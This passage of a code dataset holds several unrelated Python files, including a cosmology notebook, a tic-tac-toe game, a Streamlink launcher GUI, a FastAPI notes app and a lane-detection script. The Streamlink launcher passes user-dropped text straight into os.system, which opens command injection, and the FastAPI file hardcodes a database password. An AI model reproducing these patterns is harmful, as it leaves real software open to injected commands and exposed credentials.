,a_arreglo,'.', label='Analytic solution for a=a(t) including DM & DE')\n#plt.xscale(\"log\")\n#plt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\n#plt.xlim(-10,10000)\nplt.title(\"Analytic solution for a=a(t)\")\nplt.legend()\nplt.show()\n\n\n# Something curious: negative times come out\n\n\n# In[46]:\n\n\n# Here ta(a_arreglo) also gives negative values (note: k1 is defined in cell In[16] below)\nB=np.sqrt(4*F_2*X_0**2*e1_a1/(3*M_p**2))\nplt.plot((2*a_arreglo**(3/2)/(3*k1))/yr,'.' 
, a_arreglo, label=\"a=a(t) for the matter part\")\nplt.plot((ta(a_arreglo)-t_analitica[0])/yr ,a_arreglo, '.', label='Analytic solution for a=a(t) including DM & DE')\n\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\n#plt.xlim(-10,10000)\nplt.title(\"Analytic solution for a=a(t)\")\nplt.legend()\nplt.show()\n\n\n# In[16]:\n\n\n# For the matter term\n\nk1=np.sqrt(4*F_2*X_0**2*e1_a1/(3*M_p**2))\n\nxxx=np.log(np.abs(ta(a_arreglo)))\nyyy=np.log(a_arreglo)\ndeltaxxx=xxx[1:]-xxx[:-1]\ndeltayyy=yyy[1:]-yyy[:-1]\nplt.plot(xxx[1:],deltayyy/deltaxxx,\".\", label='slope for the matter term')\nplt.legend()\nplt.ylim(-5,5)\n\n\n# In[17]:\n\n\n# For the energy term\n#\nxxx=np.abs(ta(a_arreglo))\nyyy=np.log(a_arreglo)\ndeltaxxx=xxx[1:]-xxx[:-1]\ndeltayyy=yyy[1:]-yyy[:-1]\nplt.plot(xxx[1:],deltayyy/deltaxxx,\".\", label='slope for the energy term')\nplt.ylim(-.5,.5)\nplt.legend()\n\n\n# In[18]:\n\n\n# Analytic solution for y=y(a), where y=phi_dot, from the equality epoch until today.\ndef y_analit(a):\n    return np.sqrt(2*X_analit(a))\n\n\n# In[19]:\n\n\n# Plot of y=y(a), y=phi_dot, from the equality epoch until today.\nplt.plot(a_arreglo,y_analit(a_arreglo), '.', label='analytic y(a) solution')\nplt.xlabel(\"a\")\nplt.ylabel(\"\phi(a)\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.title(\"Analytic solution for y(a)=\phi_dot(a) from the equality epoch until today\")\nplt.legend()\n\n\n# In[20]:\n\n\n# Plot of \phi=phi(t); note ta() has no positive values\nplt.plot(ta(a_arreglo),y_analit(a_arreglo),'.', label='Analytic solution for y=y(t)')\nplt.xlabel(\"t\")\nplt.ylabel(\"y(t)\")\n#plt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.title(\"Analytic solution for y(t)=\phi_dot(t) from the equality epoch until today\")\nplt.legend()\n\n\n# In[21]:\n\n\n# Slope for y(t)\n#\nxxx=np.abs(ta(a_arreglo))\nyyy=np.log(y_analit(a_arreglo))\ndeltaxxx=xxx[1:]-xxx[:-1]\ndeltayyy=yyy[1:]-yyy[:-1]\nplt.plot(xxx[1:],deltayyy/deltaxxx,\".\", label='slope for analytic y(t)')\nplt.ylim(-.5,.5)\n\n\n# In[22]:\n\n\n# The following numerical solution evolves the parameters from the\n# equality epoch until today\n\n\n# In[23]:\n\n\n# Numerical solution for y=\phi_dot(t)\ndef ec_for_y(y,a):\n    l=8*np.pi*G/3\n    m=(y**2/2 -X_0)*y\n    n=(3*y**2)/2-X_0\n    A=m/n\n    return -3*np.sqrt(l*(F_2*(3*y**4/4 + y**2*X_0 - X_0**2)-F_0))*A\n\n\n# In[24]:\n\n\n# Numerical solution for a(t)\ndef ec_for_a(y,a):\n    return np.sqrt((8*np.pi*G/3)*(F_2*(3*y**4/4 + y**2*X_0 - X_0**2)-F_0))*a\n\n\n# In[25]:\n\n\n# System of equations\ndef funcion_vectorial(x,t):\n    y,a=x\n    eval_1=ec_for_y(y,a)\n    eval_2=ec_for_a(y,a)\n    return [eval_1,eval_2]\n\n\n# In[26]:\n\n\ncondiciones_iniciales=[y_ini,a_ini] # the scale factor runs from the equality epoch until today\n\n\n# In[27]:\n\n\ntn=np.linspace(t_eq,t_uni,100000) # time runs from the equality epoch until today\n\n\n# In[28]:\n\n\n#tlog=np.logspace(np.log10(t_eq),np.log10(t_uni),10000) # logarithmic time\n#tlog\n\n\n# In[29]:\n\n\nsol=odeint(funcion_vectorial,condiciones_iniciales,tn)\n\n\n# In[30]:\n\n\n#sol\n\n\n# In[31]:\n\n\n# Plot of \phi=\phi(t)\nplt.plot(tn,sol[:,0], label='Numerical solution \phi=\phi(t)')\nplt.plot(ta(a_arreglo)-t_analitica[0],y_analit(a_arreglo), label='Analytic solution for y=y(t)')\n\nplt.xlabel('time')\nplt.ylabel('y(t)')\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.title(\"Numerical solution for 
y=y(t)\")\nplt.legend()\n#print(sol[:,0])\n\n\n# In[32]:\n\n\n\"\"\"\n#Pediente para y(t) numerico\n#\nXX=tn\nYY=np.log(y_analit(a_arreglo))\ndeltaXX=XX[1:]-XX[:-1]\ndeltaYY=YY[1:]-YY[:-1]\nplt.plot(XX[1:],deltaYY/deltaXX,\".\", label='pendiete para y(t) numerico')\n\"\"\"\n\n\n# In[33]:\n\n\n#ploteo para para a=a(t)\nplt.plot(tn,sol[:,1], '.', label='Solucion numerica para a=a(t)')\nplt.plot(ta(a_arreglo),a_arreglo, '.', label='Solucion analitica para a=a(t)')\nplt.title(\"Solución numérica para a=a(t)\")\n#plt.ylim(0,100)\n#plt.xscale(\"log\") \n#plt.yscale(\"log\")\nplt.xlabel('t')\nplt.ylabel('a(t)')\nplt.legend()\n\n\n# In[34]:\n\n\nplt.plot(sol[:,1],sol[:,0],\"-.\",label=\"Solucion Numerica para y=y(a)\")\nplt.plot(a_arreglo,y_analit(a_arreglo),label=\"Analitica para y=y(a)\")\n\nplt.xlabel('a')\nplt.ylabel('y(a)')\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend()\nplt.title(\"Solución numerica para y=y(a)\")\n\n\n# In[35]:\n\n\nanum=sol[:,1]\nynum=sol[:,0]\n\n\n# In[36]:\n\n\ndloga_dt=(np.log(anum[1:])-np.log(anum[:-1]))/(tn[1:]-tn[:-1])\n\n\n# In[37]:\n\n\nplt.plot(anum[1:],dloga_dt,\".\",label='pendiente en ')\nplt.xscale(\"log\") \nplt.yscale(\"log\")\n\n\n# In[38]:\n\n\ndloga_dlogt=(np.log(anum[1:])-np.log(anum[:-1]))/(np.log(tn[1:])-np.log(tn[:-1]))\n\n\n# In[39]:\n\n\nplt.plot(anum[1:],dloga_dlogt,\".\")\nplt.xlim(.01,10)\nplt.xscale(\"log\") \nplt.yscale(\"log\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"joseljimenez/ServicioSocial","sub_path":"K-essencia/Purely Kinetic k essence.py","file_name":"Purely Kinetic k essence.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1743532388","text":"from tkinter import *\nfrom tkinter import messagebox\nimport random\nimport time\n\ntk = Tk()\napp_runimg = True\n\nsize_canas_x = 768\nsize_canas_y = 768\n\n\ndef on_closing():\n global app_runimg\n if messagebox.askokcancel(\"Выход из игры\", \"Хотите выйти из игры\"):\n app_runimg = False\n tk.destroy()\n\n\ntk.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\ntk.title(\" Игра крестики нолики\")\ntk.resizable(0, 0)\ntk.attributes(\"-topmost\", 1)\ncanvas = Canvas(tk, width=size_canas_x, height=size_canas_y,\n bd=0, highlightthickness=0)\ncanvas.pack()\ntk.update()\n\ns_x = 3\ns_y = 3\nstep_x = size_canas_x // s_x\nstep_y = size_canas_y // s_y\n\n\ndef draw_table():\n for i in range(0, s_x + 1):\n canvas.create_line(0, i * step_y, size_canas_x, i * step_y)\n for i in range(0, s_y + 1):\n canvas.create_line(i * step_y, 0, i * step_y, size_canas_y)\n\n\npoints = []\ndraw_table()\n\n\nclass Point:\n def __init__(self, x, y, type):\n self.x = x\n self.y = y\n self.type = type\n\n def __str__(self):\n return str(self.__class__) + \":\" + str(self.__dict__)\n\n\ndef draw_point(x, y, type):\n size = 25\n color = \"black\"\n if type == 0:\n color = \"red\"\n if type == 1:\n color = \"blue\"\n print(type)\n #id = canvas.create_oval(x * step_x, y * step_y, x * step_x + step_x, y * step_y + step_y, fill=color)\n\n\ndef add_to_points(event):\n print(event.num, event.x, event.y, type)\n type = 0\n if event.num == 3:\n type = 1\n points.append(Point(event.x // step_x, event.y // step_x, type))\n draw_point(event.x, event.y, type)\n print(\"\".join(map(str, points)))\n\n\ncanvas.bind_all(\"Button-1\", add_to_points)\ncanvas.bind_all(\"Button-1\", add_to_points)\n\nwhile app_runimg:\n if app_runimg:\n tk.update_idletasks()\n 
        tk.update()\n    time.sleep(0.005)\n","repo_name":"vyky1983/Python","sub_path":"game/frest_game.py","file_name":"frest_game.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71709933547","text":"from typing import Optional\n\nimport requests\nimport structlog  # type: ignore\nfrom flask import current_app, has_request_context\n\nlogger = structlog.get_logger(__name__)\n\n\nclass VictorOpsClient:\n    def __init__(self, url: str, routing_key: str):\n        self.alert_url = f\"{url}/{routing_key}\"\n\n    @classmethod\n    def get(cls) -> \"VictorOpsClient\":\n        \"\"\"\n        Get a configured VictorOps client from the Flask app config\n        \"\"\"\n        return current_app.config[\"victor_ops_client\"]\n\n    def _alert(\n        self,\n        message_type: str,\n        entity_id: str,\n        entity_display_name: Optional[str] = None,\n        state_message: Optional[str] = None,\n    ):\n        return requests.post(\n            self.alert_url,\n            data=dict(\n                message_type=message_type,\n                entity_id=entity_id,\n                entity_display_name=entity_display_name,\n                state_message=state_message,\n            ),\n        )\n\n    def critical(\n        self,\n        entity_id: str,\n        entity_display_name: Optional[str] = None,\n        state_message: Optional[str] = None,\n    ):\n        return self._alert(\"CRITICAL\", entity_id, entity_display_name, state_message)\n\n    def warning(\n        self,\n        entity_id: str,\n        entity_display_name: Optional[str] = None,\n        state_message: Optional[str] = None,\n    ):\n        return self._alert(\"WARNING\", entity_id, entity_display_name, state_message)\n\n    def ack(\n        self,\n        entity_id: str,\n        entity_display_name: Optional[str] = None,\n        state_message: Optional[str] = None,\n    ):\n        return self._alert(\n            \"ACKNOWLEDGEMENT\", entity_id, entity_display_name, state_message\n        )\n\n    def info(\n        self,\n        entity_id: str,\n        entity_display_name: Optional[str] = None,\n        state_message: Optional[str] = None,\n    ):\n        return self._alert(\"INFO\", entity_id, entity_display_name, state_message)\n","repo_name":"clohr/model-service","sub_path":"core/clients/victor_ops.py","file_name":"victor_ops.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16066203522","text":"import tkinter as tk\nfrom tkinter import BOTH, BOTTOM, LEFT, RIGHT, TOP, X, Y, Frame, Label, Listbox, ttk\nfrom tkinterdnd2 import *\nimport os\n\nclass App(TkinterDnD.Tk):\n    def __init__(self):\n        super().__init__()\n\n        # create the main window\n        self.title('StreamlinkTk')\n        self.geometry('330x450')\n        self.resizable(True, True)\n        self.config(bg=\"#222222\")\n        \n        if os.name == \"nt\":\n            self.option_add('*Font', 'Arial 12')\n        else:\n            self.option_add('*Font', 'Arial 17')\n\n        self.frame = Frame(self)\n        self.frame.pack()\n\n        self.bottomframe = Frame(self)\n        self.bottomframe.pack( side = BOTTOM )\n\n        # listbox def\n        self.listbox = tk.Listbox(self.frame, height=16, width=30, selectmode='single')\n        self.listbox.config(bg='#222222', fg=\"#EEEEEE\")\n        self.listbox.pack(pady=10, side= LEFT)\n\n        self.listbox.bind('<<ListboxSelect>>',lambda event:items_selected(event))\n\n        # link a scrollbar to a list\n        self.scrollbar = ttk.Scrollbar(self.frame, orient='vertical')\n        self.scrollbar.pack(side=RIGHT, fill=Y)\n        self.listbox.configure(yscrollcommand=self.scrollbar.set)\n        self.scrollbar.config(command=self.listbox.yview)\n\n        # drag n drop label\n        self.label = Label(self.bottomframe, width=30, text=\"drag and drop\")\n        self.label.pack(padx=5, pady=5, fill=X)\n        \n        def dropEvent(event):\n            if event.data:\n
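                # event.data holds the dropped text (typically a stream URL)\n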
                # self.label.configure(text=event.data)\n                retrieve_input(event.data)\n            return event.action\n\n        self.drop_target_register(DND_TEXT)\n        self.dnd_bind('<<Drop>>', dropEvent)\n\n        # textbox def\n        self.textBox=tk.Entry(self.bottomframe)\n        self.textBox.bind('<Return>',lambda event:retrieve_input(self.textBox.get()))\n        self.textBox.bind('<Button-3>',lambda event:Paste())\n        self.textBox.pack(padx=10, side= LEFT)\n        \n        # button def\n        self.buttonCommit=tk.Button(self.bottomframe, text=\"Commit\", command=lambda:retrieve_input(self.textBox.get()))\n        self.buttonCommit.pack(padx=10, side= LEFT)\n        \n        # load links\n        filetxt = open('links.txt', 'r')\n        liste = filetxt.readlines()\n        filetxt.close()\n\n        # populate listbox\n        for item in liste:\n            itemr = item.replace(\"\n\", \"\")\n            self.listbox.insert(tk.END, itemr)\n        \n        # retrieve textbox text\n        def retrieve_input(widg):\n            # widg=widg \n            # print(widg)\n            self.textBox.delete(0, tk.END)\n            self.listbox.insert(tk.END, widg + '\n')\n            with open('links.txt', 'a') as f:\n                f.write(widg + '\n')\n                f.close()\n\n        # paste when R-click\n        def Paste():\n            self.textBox.event_generate('<<Paste>>')\n            retrieve_input(self.textBox.get())\n\n        # click link\n        def items_selected(event):\n            indexLb = event.widget.curselection()\n            link = event.widget.get(indexLb).replace(\"\n\", \"\")\n            commandsl(link)\n\n        # Send link to streamlink\n        def commandsl(link): \n            command = \"streamlink \" + link + \" best\"\n            print(command)\n            res = os.system(command)\n\n\nif __name__ == \"__main__\":\n    app = App()\n\n    app.mainloop()","repo_name":"ishbutz/pysltk","sub_path":"pysltkv3.py","file_name":"pysltkv3.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26672704047","text":"from typing import List\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom sqlalchemy.ext.asyncio import create_async_engine\n\nimport databases\nimport sqlalchemy\n\nhost = \"localhost\"\ndb_adapter = \"+asyncmy\"\n# db_adapter = \"+pymysql\"\n# db_adapter = \"\"\nport = 3306\nusername = \"root\"\npassword = \"jhlee1324\"\ndatabase_name = \"soron\"\nDATABASE_URL = (\n    f\"mysql{db_adapter}://{username}:{password}@{host}:{port}/{database_name}\"\n)\n\ndatabase = databases.Database(DATABASE_URL)\n\nmetadata = sqlalchemy.MetaData()\n\nnotes = sqlalchemy.Table(\n    \"notes\",\n    metadata,\n    sqlalchemy.Column(\"id\", sqlalchemy.Integer, primary_key=True),\n    sqlalchemy.Column(\"text\", sqlalchemy.String),\n    sqlalchemy.Column(\"completed\", sqlalchemy.Boolean),\n)\n\nasync_engine = create_async_engine(DATABASE_URL)  # create_async_engine returns a single engine\n# engine = sqlalchemy.create_engine(\n#     DATABASE_URL, connect_args={\"check_same_thread\": False}\n# )\n# metadata.create_all(engine)\n\n\nclass NoteIn(BaseModel):\n    text: str\n    completed: bool\n\n\nclass Note(BaseModel):\n    id: int\n    text: str\n    completed: bool\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n    await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n    await database.disconnect()\n\n\n@app.get(\"/notes/\", response_model=List[Note])\nasync def read_notes():\n    query = notes.select()\n    return await database.fetch_all(query)\n\n\n@app.post(\"/notes/\", response_model=Note)\nasync def create_note(note: NoteIn):\n    query = notes.insert().values(text=note.text, completed=note.completed)\n    last_record_id = await database.execute(query)\n    return {**note.dict(), \"id\": 
last_record_id}\n","repo_name":"dople1227/fastAPI-Vue-docker","sub_path":"services/backend/seminar/seminar_async/dbtest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4223957338","text":"import torch\n\nfrom .diversity_validator import DiversityValidator\nfrom .entropy_validator import EntropyValidator\nfrom .multiple_validators import MultipleValidators\n\n\nclass IMValidator(MultipleValidators):\n    \"\"\"\n    The sum of [EntropyValidator][pytorch_adapt.validators.EntropyValidator]\n    and [DiversityValidator][pytorch_adapt.validators.DiversityValidator]\n    \"\"\"\n\n    def __init__(self, weights=None, **kwargs):\n        self.layer = kwargs.pop(\"layer\", None)\n        inner_kwargs = {} if not self.layer else {\"layer\": self.layer}\n        validators = {\n            \"entropy\": EntropyValidator(**inner_kwargs),\n            \"diversity\": DiversityValidator(**inner_kwargs),\n        }\n        super().__init__(validators=validators, weights=weights, **kwargs)\n\n\nclass IMCombinedValidator(IMValidator):\n    \"\"\"\n    The sum of [EntropyValidator][pytorch_adapt.validators.EntropyValidator]\n    and [DiversityValidator][pytorch_adapt.validators.DiversityValidator]\n    \"\"\"\n\n    def __init__(self, weights=None, **kwargs):\n        super().__init__(weights=weights, **kwargs)\n\n    def __call__(self, src_train, target_train):\n        if self.layer is None:\n            combined = {\"logits\": torch.cat([src_train[\"logits\"], target_train[\"logits\"]])}\n        else:\n            combined = {self.layer: torch.cat([src_train[self.layer], target_train[self.layer]])}\n        return super().__call__(target_train=combined)\n","repo_name":"linusericsson/better-da","sub_path":"src/pytorch_adapt/validators/im_validator.py","file_name":"im_validator.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8767181729","text":"'''\nPipeline:\n1. Gaussian blur  done\n2. convert to grayscale  done\n3. warp to a bird's-eye view  done\n4. binarize to black and white  done\n5. find the white points on the left and right sides  done (looks fine, though if the point at the first height is missed the rest will very likely be missed too; it is all loops, which is inefficient, but I do not know how to vectorize it)\n6. use the points from step 5 (when a side has 3 or more) to build the matrix for y = ax^2+bx+c, solve it and obtain the curve  done\n7. 
draw the fitted lines, warp back from the bird's-eye view and overlay them on the original frame\n'''\nimport cv2\nimport os\nimport numpy as np\nimport copy\nfrom scipy.optimize import curve_fit\nimport time\nimport warnings\nfrom tqdm import tqdm\n\n'''\nreturn the vertices of ROI\n'''\ndef get_vertices(image):\n    return np.float32([[200, 720],[1100, 720],[595, 450],[685, 450]])\n\n# warp the image to a bird's-eye view\ndef overhead(transform_h,transform_w,img):\n    source = np.float32(get_vertices(img))\n    destination = np.float32([[300,720],[980,720],[300,0],[900,0]])\n    overhead_transform = cv2.getPerspectiveTransform(source, destination)\n    overhead_img = cv2.warpPerspective(img, overhead_transform, dsize=(transform_w, transform_h),flags=cv2.INTER_LINEAR)\n\n    return overhead_img\n\n'''\nUnwarp the image from overhead back to the original perspective\n'''\ndef unoverhead(transform_h,transform_w,img):\n    source = np.float32(get_vertices(img))\n    destination = np.float32([[300,720],[980,720],[300,0],[900,0]])\n    overhead_transform = cv2.getPerspectiveTransform(destination,source)\n    overhead_img = cv2.warpPerspective(img, overhead_transform, dsize=(transform_w, transform_h),flags=cv2.INTER_LINEAR)\n\n    return overhead_img\n\n'''\nbinarize the image to black and white to separate the lane from the road\n'''\ndef binary(img):\n    sort = np.sort(img.flatten())\n    mid = sort[[int(720*1280*0.5)]]\n    top = sort[[int(720*1280*0.9)]]\n    thres = int(mid+top/2)\n    binary_img = cv2.threshold(img,thres,255,cv2.THRESH_BINARY)[1]\n\n    return binary_img\n\n# search for white pixels window by window (white = on the lane)\ndef find_line_points(img):\n    win_h = int(img.shape[0]/10) # window height\n    win_w = 200 # window width\n    half_range = int(win_w/2)\n\n    flag_left = 0 # flag == 0: no white found yet; flag == 1: first white found; flag == 2: last white found and the midpoint computed\n    flag_right = 0\n\n    left_1 = 0 # first white pixel of the left line\n    left_2 = 0 # last white pixel of the left line\n    right_1 = 0\n    right_2 = 0\n\n    left_mid = 333 # midpoint between left_1 and left_2\n    right_mid = 1013\n\n    left_points = [] # collected left points; 0 means no white point was found, any other value is the x coordinate of that point\n    right_points = []\n\n    # scan the bottom row (the first height) to find the first point on each side\n    for i in range(640):\n        if img[720-win_h][i] == 255 and flag_left == 0:\n            flag_left = 1\n            left_1 = i\n        elif img[720-win_h][i] == 0 and flag_left == 1:\n            flag_left = 2\n            left_2 = i\n        \n        if img[720-win_h][1279-i] == 255 and flag_right == 0:\n            flag_right = 1\n            right_1 = i\n        elif img[720-win_h][1279-i] == 0 and flag_right == 1:\n            flag_right = 2\n            right_2 = i\n        \n        if flag_right == 2 and flag_left == 2:break\n\n    if flag_left == 2:\n        left_mid = left_1 + int((left_2-left_1)/2)\n        left_points.append(left_mid)\n    else:\n        left_points.append(0)\n    if flag_right == 2:\n        right_mid = 1280 - (right_2 + int((right_1-right_2)/2))\n        right_points.append(right_mid)\n    else:\n        right_points.append(0)\n\n    flag_left = 0\n    flag_right = 0\n\n    # scan the remaining 8 heights\n    for i in range(8):\n        for j in range(win_w):\n            current_L = img[720-win_h*(i+2)][left_mid-half_range+j]\n            current_R = img[720-win_h*(i+2)][right_mid-half_range+j]\n\n            if current_L == 255 and flag_left == 0:\n                flag_left = 1\n                left_1 = j\n            elif current_L == 0 and flag_left == 1:\n                flag_left = 2\n                left_2 = j\n            \n            if current_R == 255 and flag_right == 0:\n                flag_right = 1\n                right_1 = j\n            elif current_R == 0 and flag_right == 1:\n                flag_right = 2\n                right_2 = j\n\n        if right_mid > 1280 - half_range - 5:right_mid = 1280 - half_range - 5\n\n        if flag_left == 2:\n            left_mid = left_mid - half_range + left_1 + int((left_2-left_1)/2)\n            left_points.append(left_mid)\n        else:\n            left_points.append(0)\n        if flag_right == 2:\n            right_mid = right_mid - half_range + right_2 + int((right_1-right_2)/2)\n            right_points.append(right_mid)\n        else:\n            right_points.append(0)\n\n        flag_left = 0\n        flag_right = 
0\n\n return left_points,right_points\n\n'''\nthe formula of the curve\n'''\ndef func(x, a, b, c):\n return a * x**2 + b * x + c\n\n'''\nfind the parameters of the curve of given edge points\n'''\ndef fit_curve(points):\n xdata = []\n ydata = []\n flag = 0\n last_1 = [0,0]\n last_2 = [0,0]\n for i in range(9):\n if points[i] != 0:\n xdata.append(points[i])\n ydata.append(720 - int(720 * (i+1) / 10))\n if flag == 0:\n last_1 = [720 - int(720 * (i+1) / 10),points[i]]\n flag = 1\n else:\n last_2 = last_1\n last_1 = [720 - int(720 * (i+1) / 10),points[i]]\n flag = 2\n # fake point\n if flag == 2:\n fake_x = int((last_1[0]*last_2[1] - last_2[0]*last_1[1])/(last_1[0] - last_2[0]))\n xdata.append(fake_x)\n ydata.append(0)\n delta_x = xdata[0] - xdata[1]\n delta_y = ydata[0] - ydata[1]\n fake_x = int((800 - ydata[0]) * (delta_x / delta_y) + xdata[0])\n xdata.insert(0, fake_x)\n ydata.insert(0, 800 - 1)\n popt, _ = curve_fit(func, xdata, ydata)\n return popt,xdata\n else:\n return 0,[]\n\n'''\nplot the lane line on the binary image\n'''\ndef generate_line_image(binary_img):\n line_img = np.zeros((720,1280), np.uint8)\n\n left_points,right_points = find_line_points(binary_img)\n left_popt,xdata = fit_curve(left_points)\n xlimit = 0\n xmin = 0\n if len(xdata) >= 3:\n xlimit = np.max(xdata)\n xmin = np.min(xdata)\n left_x = np.linspace(xmin, xlimit, 100)\n left_y = func(left_x, *left_popt)\n cv2.polylines(line_img, pts=[np.array([*zip(left_x, left_y)], np.int32)], isClosed=False, color=255, thickness=15)\n\n right_popt,xdata = fit_curve(right_points)\n if len(xdata) >= 3:\n xlimit = np.max(xdata)\n xmin = np.min(xdata)\n right_x = np.linspace(xmin, xlimit, 100)\n right_y = func(right_x, *right_popt)\n cv2.polylines(line_img, pts=[np.array([*zip(right_x, right_y)], np.int32)], isClosed=False, color=255, thickness=15)\n\n return line_img\n\ndef draw_line(img):\n img = cv2.resize(img,(1280,720), interpolation=cv2.INTER_AREA)\n img_copy = copy.deepcopy(img)\n img = cv2.GaussianBlur(img, (5,5), 0)\n grayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n overhead_img = overhead(720,1280,grayscale_img)\n binary_img = binary(overhead_img)\n\n line_img = generate_line_image(binary_img)\n\n line_img = unoverhead(720,1280,line_img)\n foreground = np.zeros((img_copy.shape), np.uint8)\n foreground[:, :, 2] = line_img\n background = cv2.bitwise_and(img_copy, img_copy, mask=cv2.bitwise_not(line_img))\n img = cv2.bitwise_or(foreground, background)\n\n #cv2.imshow('img',img)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n #cv2.imwrite(os.path.join('results', 'solidWhiteRight_result.jpg'), img)\n\n return img\n\nif __name__ == '__main__':\n #img = cv2.imread(os.path.join('datasets', 'solidWhiteRight.jpg'))\n #draw_line(img)\n cap = cv2.VideoCapture(os.path.join('datasets', 'project_video.mp4'))\n video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n out = cv2.VideoWriter(os.path.join('results', 'project_video_result.mp4'), fourcc, fps, (w, h))\n \n start_time = time.time()\n for i in tqdm(range(video_length)):\n if cap.isOpened():\n ret, img = cap.read()\n if not ret:\n break\n img = draw_line(img)\n out.write(img)\n\n end_time = time.time()\n print('Spend {:.3f} second.'.format(end_time - start_time))\n cap.release()\n 
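# releasing the writer finalizes the encoded output file\n    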
out.release()","repo_name":"cindy203cc/CV_final","sub_path":"advanced_video.py","file_name":"advanced_video.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32270289983","text":"\"\"\"\nPreprocess the Retail Rocket data\n\"\"\"\n\nimport csv\nimport logging\nimport subprocess\n\nfrom src import settings\nfrom src.data_preparation import data_preparation, sparse_vector\n\n# config log\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\ndata_name = \"retail_rocket/\"\nroot_path = settings.DATA_ROOT_PATH + \"site_data/\" + data_name\n\n\ndef gen_cleaned_data(input_file, cleaned_implicit_data_path, cleaned_explicit_data_path):\n    logging.info('Gen raw data')\n\n    implicit_output = open(cleaned_implicit_data_path, 'w')\n    explicit_output = open(cleaned_explicit_data_path, 'w')\n    csv_writer_implicit = csv.writer(implicit_output, delimiter=',', quotechar='', quoting=csv.QUOTE_NONE)\n    csv_writer_explicit = csv.writer(explicit_output, delimiter=',', quotechar='', quoting=csv.QUOTE_NONE)\n\n    with open(input_file, 'r') as file:\n        csv_reader = csv.reader(file, delimiter=',', quotechar='', quoting=csv.QUOTE_NONE)\n        line = next(csv_reader)  # skip header\n        for line in csv_reader:\n            timestamp = line[0]\n            raw_uid = line[1]\n            event = line[2]\n            raw_item_id = line[3]\n            csv_writer_implicit.writerow([raw_uid, raw_item_id, timestamp])\n            if (event == 'transaction') or (event == 'addtocart'):\n                csv_writer_explicit.writerow([raw_uid, raw_item_id, timestamp])\n            # write every interaction to the implicit file so blacklisted users can be filtered accurately\n\n    implicit_output.close()\n    explicit_output.close()\n\n\ndef construct_pcat_repr():\n    with open(root_path + 'i2index.txt') as f:\n        active_item_list = [line.split(',')[0] for line in f]\n    print(len(active_item_list))\n\n    item_dict = {}\n    with open(root_path + 'i2pcat.txt') as f:\n        for line in f:\n            item_id, pcat = line.split(',')\n            if item_id not in item_dict:\n                item_dict[item_id] = [int(pcat)]\n            else:\n                item_dict[item_id].append(int(pcat))\n    print(len(item_dict))\n    cat2parent = {}\n    max_cat = 0\n    with open(root_path + 'raw_data/category_tree.csv', newline='') as f:\n        next(f)\n        for line in f:\n            cat, parent = line.strip().split(',')\n            cat = int(cat)\n            if cat > max_cat:\n                max_cat = cat\n            if parent != '':\n                parent = int(parent)\n                if parent > max_cat:\n                    max_cat = parent\n                cat2parent[cat] = parent\n    if 231 in cat2parent:\n        print('huhu')\n    with open(root_path + 'item_repr.txt', 'w') as f:\n        f.write(str(max_cat + 1) + '\n')\n        csv_writer = csv.writer(f, delimiter=',', quotechar='|', quoting=csv.QUOTE_ALL)\n        for item_id in item_dict:\n            sp_vec = banner_cats_to_vector(item_dict[item_id], cat2parent)\n            sp_repr = sparse_vector.dict_sparse_vector_to_json_string(sp_vec)\n            csv_writer.writerow((item_id, sp_repr))\n    print('Done inferring pcat repr of retail_rocket items!')\n\n\ndef banner_cats_to_vector(cats, cat_to_parent_cat):\n    sv = {}\n    for cat in cats:\n        sv[cat] = 1.0\n        while cat in cat_to_parent_cat:\n            cat = cat_to_parent_cat[cat]\n            sv[cat] = 1.0\n    banner_spare_vector = sparse_vector.normalize(sv)\n    return banner_spare_vector\n\n\ndef main():\n    # data_path = settings.DATA_ROOT_PATH + \"site_data/\" + data_name + \"/raw_data/events_purchase.csv\"\n    data_path = root_path + 'raw_data/new_events.csv'\n\n    cleaned_implicit_data_path = root_path + '_implicit.clean.txt'\n    cleaned_explicit_data_path = root_path + '_explicit.clean.txt'\n\n
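    # u2index.txt / i2index.txt will hold the dense user and item re-numbering built below\n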
